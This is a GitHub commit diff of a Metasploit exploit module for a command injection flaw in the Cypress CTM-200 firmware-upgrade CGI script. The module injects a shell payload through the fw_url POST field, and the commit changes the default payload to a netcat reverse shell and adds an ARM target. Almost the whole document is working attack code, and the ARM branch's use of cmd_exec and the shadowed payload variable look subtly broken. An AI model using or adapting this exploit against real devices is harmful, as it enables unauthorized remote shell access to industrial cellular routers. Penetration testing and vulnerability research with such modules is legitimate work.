Skip to content

Commit

Permalink
Update module to include modified recommendations
Browse files Browse the repository at this point in the history
  • Loading branch information
@0x45dd
0x45dd committed Aug 28, 2024
1 parent 74943a4 commit ffcf08b
Showing 1 changed file with 39 additions and 37 deletions.
76 changes: 39 additions & 37 deletions modules/exploits/linux/http/cypress_ctm200_command_injection.rb
View file
Original file line number Diff line number Diff line change
@@ -1,15 +1,11 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'uri'

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
Expand Down Expand Up @@ -37,33 +33,33 @@ def initialize(info = {})
'BadChars' => ''
},
'Platform' => ['unix'],
'Arch' => [ARCH_CMD],
'Targets' => [['Automatic', {}]],
'Arch' => [ARCH_CMD, ARCH_ARM],
'Targets' => [
['Automatic', {}],
['ARM Linux', { 'Arch' => ARCH_ARM }]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2021-09-21',
'DefaultOptions' => {
'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
'PAYLOAD' => 'cmd/unix/reverse_netcat'
}
)
)

register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the vulnerable application', '/cgi-bin/webif/ctm-config-upgrade.sh']),
OptString.new('RHOST', [true, 'The target address']),
OptString.new('LHOST', [true, 'The local host for reverse shell']),
OptString.new('LPORT', [true, 'The local port for reverse shell'])
OptString.new('TARGETURI', [true, 'The base path to the vulnerable application', '/'])
]
)
end

def check
# Generate a random string to use in our payload
unique_string = "echo '#{Rex::Text.rand_text_alphanumeric(10..15)}'"

# Construct the payload with the unique_string
payload = "`#{unique_string}`"

# Prepare the POST request to test the vulnerability
data = {
'submit' => '1',
Expand All @@ -72,48 +68,54 @@ def check
'install_fw_url' => 'Start Firmware Upgrade from URL',
'pkgurl' => ''
}

# Send the POST request to the target
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'uri' => normalize_uri(target_uri.path, 'cgi-bin/webif/ctm-config-upgrade.sh'),
'vars_post' => data
})

unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end

# Check if the random string is in the response body
if res.code == 200 && res.body.include?(unique_string)
return CheckCode::Vulnerable
end

CheckCode::Safe
end

def exploit
payload = "#{payload.encoded}"
data = {
'submit' => '1',
'upgradefile' => '',
'fw_url' => payload,
'install_fw_url' => 'Start Firmware Upgrade from URL',
'pkgurl' => ''
}
if target.name == 'ARM Linux'
# Use CmdStager for ARM payloads
cmd_exec payload.encoded
else
# For command-based payloads
payload = "#{payload.encoded}"
data = {
'submit' => '1',
'upgradefile' => '',
'fw_url' => payload,
'install_fw_url' => 'Start Firmware Upgrade from URL',
'pkgurl' => ''
}

res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'vars_post' => data,
'rport' => rport
})
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'cgi-bin/webif/ctm-config-upgrade.sh'),
'vars_post' => data,
'rport' => rport
})

if res && res.code == 200
print_good('Exploit sent successfully. Listening meterpreter shell')
else
print_error('Exploit failed. Target may not be vulnerable.')
if res && res.code == 200
print_good('Exploit sent successfully. Listening for payload')
else
print_error('Exploit failed. Target may not be vulnerable.')
end
end
end
end
Expand Down

0 comments on commit ffcf08b

Please sign in to comment.